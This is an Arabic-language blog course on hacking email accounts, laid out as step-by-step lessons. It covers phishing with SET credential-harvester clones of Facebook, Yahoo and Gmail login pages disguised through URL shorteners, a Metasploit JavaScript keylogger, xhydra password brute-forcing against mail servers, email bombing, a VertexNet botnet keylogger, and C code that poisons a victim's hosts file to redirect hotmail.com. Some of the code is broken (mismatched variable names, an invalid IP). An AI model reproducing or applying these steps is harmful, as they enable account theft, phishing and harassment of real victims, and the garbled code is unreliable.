الدرس الخامس والاخير

0 التعليقات


الطريق الخامس  والاخيرة

سحب الايميلات على دومين [ + ] [ Back Track ]
تابع الاتي
[ msfconsole ]
بعدين
[ Enter ]
[ use gather/search_email_collector ]
وبعدين
[ Enter ]
[ set DOMAIN hotmail.com ]
وبعدين
[ Enter ]
[ ملاحظه غير الدومين الي تبيه ]
[ النتيجه ]



[هى مجرد طريقة للسحب وليس لها اهمية تم وضعها لاستكامل فثط ]


الدرس الرابع الجزء الثانى

0 التعليقات



الطريقة الرابعة

فتح ادة 
set

طبعا اول ما تشغلها سوف يظهر لك الواجهة الرئيسية للاداة ومنها الخيرات لبدء العمل
اختار الخيار الثاني من القائمة

ااو غتح الادة سثغ مباشر

نختار5
Mass Mailer Attack

بعدين1
Use a GMAIL Account for your email attack.

بعدين هتظهر
Enter who you want to send email to

To ايميل الضحية 
Enter your GMAIL email address: الايميل 

Enter your password for gmail :باسورد:

Do you want to flag this message/s as high priority? yes or no: Yes

Website Attack Vectors

وبعدين 
3. Credential Harvester Attack Method
بعدين

1. Web Templates

بعدين بتختار اللى عايزو سوا تويتر او فيس او هوت ميل 
وبعدين انتر 
وتنتظر فتخ الضخيه الرسالة وتسجيل البيانات

اهم جزء
لزم تظهر دى دليل نجاح الارسالة[*] SET has finished sending the emails.
ملحوظة وضع لينك الصفحة المزوره فى الرسالة 



طريقة ليس لها اهمية فى نظرى المتواضع كانك ارسالة رسالة صفحة مزوه لشخص
لكن بدل انا تستخدم الايميل مباشر استخدم الباك تراك 

الدرس الثالث من الجزء الثانى

0 التعليقات
ا


لطريقة الثالثة


استغلال اداة [ msfpro ] [ + ] وسحب الـ [keylogger ]

بنستخدم سكريبت معين

دور طبعا على السكريبت هتلاقيه 
تابع الاتي

msfpro 

واضغط على 

Enter 

use auxiliary/server/capture/http_javascript_keylogger 
وبعدين

[ Enter ]

show options

وبعدين

Enter 

[ run ]

واضغط على

[ Enter ]


[ تمام دلوقتى انسخ الايبي ونعدل على السكريت

غير > xxxx الى الايبي حفكـ
النتيجه

يقوم بستخرج اليوزرات والباسودات

الدرس الثانى الجزء الثانى من الدورة

0 التعليقات

الطريقة الثانية 


عن طريقة صفحة مزوره مثالا على الفيس
اولا نفتح الادة
Set
طبعا اول ما تشغلها رح يظهر لك الواجهة الرئيسية للاداة ومنها الخيرات لبدء العمل
اختار الخيار الثاني من القائمة
W e b s i t e Attack Vectors
ومن ثم نختار الخيار الثالث من الخيارات المتوفرة
Credential Harvester Attack Method
الان نختار الخيار الثاني وهو Site Cloner
ونقوم بادخال مسار الموقع ويجب ان يكون هنالك مكان لتسجيل الدخول في الصفحة المحددة
مثلا فيسبوك بمكنك تسجيل الدخول من الصفحة الرئيسية
www.facebook.com
اما ياهوو فلا يمكنك لذلك نأخذ رابط الصفحة التي تستخدم للتسجيل
https://login.yahoo.com/config/login ونفس العملية مع جيميل
https://www.google.com/accounts/ServiceLogin الان نكمل الشرح بعد ادخال الرابط لصفحة التسجيل نقوم بالضغظ على انتر لتبدأ عملية الانشاء
للأستمرار اظغط زر انتر
هنا الاداة انتهت من عملها وتخبرك ان الصفحة المزورة موجوده على ايبي جهازك خلف البورت 80 (بورت المتصفحكل ما عليك فعله هو فتح البورت 80 في الراوتر ونسخ الأيبي الخارجي حقك ومن ثم عمل توهيم باستخدام موقع
http://tinyurl.com/ وهذا الموقع جيد ايظا يعطيك اسم دومين للرابط
http://www.dot.tk/en/index.html?lang=en لايهام وخداع الضحيةسارها  
[ فـــــــعاله بنسبة 100% ]


الدرس الاول الجزء الثانى

0 التعليقات

الجزء الثانى الاختراق من خلال الباك تراك
هدفى فى ذكر الطرق شى واحد فقط قعالية كل طريقة لا غير اما التوضيح فستجدونا الشرح كل طريق بتفصيل اما فى اليوتيوب او البركة فى اعضاء المنتدى

الطريقة الاولى 


الـتخمين
xhydra بـٌواسطه أدآه
نــُدخل بــُآلمــُوضوع بــُدون مــُقدمآت
Gmailالــُتطبيق ليــُكون عــُلى الــ ُ
xhydra  نــُفتح ادآه

بــُعد فــُتح الادآه
نعدل  الاعــُدآدادت كلاتى
Target
Single target smtp.gmail.com
port 465
Protocol smtp
Password
Username ايميل الضحية
Password List > اختر ملف الي فيه الباسوردات(سوف ادرجه في نهآية الموضوع)
try Login as password خلي علآمه صح على start
start ضغط على كلمه
وننتضر لحين ينتهي التخمين واضهار باسورد الدخول
ولو كنت تريد التخمين على الياهو
نفس الاعدادات فقط غير
Single target smtp.gmail.com
الى
Single target smtp.yahoo.com
وأذآ كآن Hotmail
نغير البورت
الى
port 587
ونغير
Single target smtp.live.com
ملف الباسورد ليست  
[ غير فعـــاله بنسبة كبيره]


مقدمة الجزء الثانى من الدورة

0 التعليقات




هذا الدورة حصريا ووانا الذى قمت بقديمها وعملها



لكم وانا برءى اما الله من يستغلها فى سرقة حسابات المسلمين او اى شخص بدون سبب  او الانتقام 




الجزء الثانى سنستخدم  الباك تراك فى اختراق الايميلات االدورة موجود باسمى فى ديفيد بوينت وفى جيوش الهكر 

الدرس التاسع من دورة اختراق الايميلات

0 التعليقات





عارف انك تعبت من قراة الموضوع ههههه لكن هى تعتبر موسعة ودورة كامل 

تابع معايه 

اخر طريقة

وهذا الطريقة لا تعتبر طريقة اخترق وهى طريقة تعتمد على اغرق الايميل بكم هائلة من الرسائل التى تجعل الضحيه 
لا يستطيع فتح صندوق الرسائل وقد تودى فى بعض الاحيان الى غلق الايميل وتعليقه خين تصل الرسائل لعد معين

البرنامج المستخدم +اثبات فعالية من جهازى

GTMailer SMS Bomb


النتيجة







الدرس الثامن من دورة اختراق الايميلات




ألطريقة السادسة من خلال البوت نت الذى يدعم الكاى لوجر
طبعا بعد عمل السيرفر بوت نت وارسالها للضحية وفتح الضحيه له سيصل التلبليغ وكل ما عليك هو تحديد الضحيه وضغط علامة (صح) عليه شرحى
وسنطرح مثال بسيطة هو البوت نت 
VertexNet
طبعا ان عندى بوت جاهز دى صورة صفحة الدخول


بعد الدخول سنتعرف على خواص البوت وما يهمنا هو الامرين التاليين الكاى لوجر وكيفية تشغيلها 


وامر سحب بيانات الت قام الكاى لوجر بتسجيلها 



لارسال الامر True طبعا بعد الاختراق ما عليك الا انك تكتب الامر


وتسحب بيانات الدخول 








الدرس السابع من دورة اختراث الايميلات





5-عن طريقة تزييف الدومينات فى جهاز الضحيه


وهى عن طريقة التلاعب بالدومين فى جهاز الضحيه اى عند دخول على الموقع الاساسى يقوم بنقلها مباشرة اللى الموقع المزوز بحيث لا يشعر الضحيه ذلك من خلال ادة تغير الهوست من جهاز الضحية 

ادة من برمجة 
الاح شــاجع
والامانة العلمية تطلب انا اذكر اسم المبرمج
يتم تصيميمها بـلغة سى بلس بلس 

Microsoft Visual C++ 6.0 

اولا تقتح البرنامج
وتختار 
File
ثم
New
ثم
File
وبعدين
Cc++ source file
وتختار اسم بعدين تحدد مكان الحفظ
كود الادة
مثال الادة على الهوتميل
كود PHP:


#include<stdio.h> void main(){ FILE *ff=fopen("C:\\WINDOWS\\system32\\drivers\\etc\\hosts","a"); fprintf(f,"\n  الاى بى بتاعكwww.hotmail.com\nالاى بى بتاعكhotmail.com"); fclose(f); //programmed by shaja }  
طريقة عمل لادة
وده المسار اللى بتقوم بتغيرو الادة 
مسار الهوست ده بيكون السبب فى انخداع الضحية 

\C:\ wINDOWS\system32\drivers\etc
hosts فى ملف الهوست

127.0.0.1 localhost

بيظهر تحتو مواقع اخر مثالا
192.168.73.18.155 www.hotmail.com
?



جميع الحقوق محفوظة ©2014-2015 | ، . Privacy-Policy| أنضم ألى فريق التدوين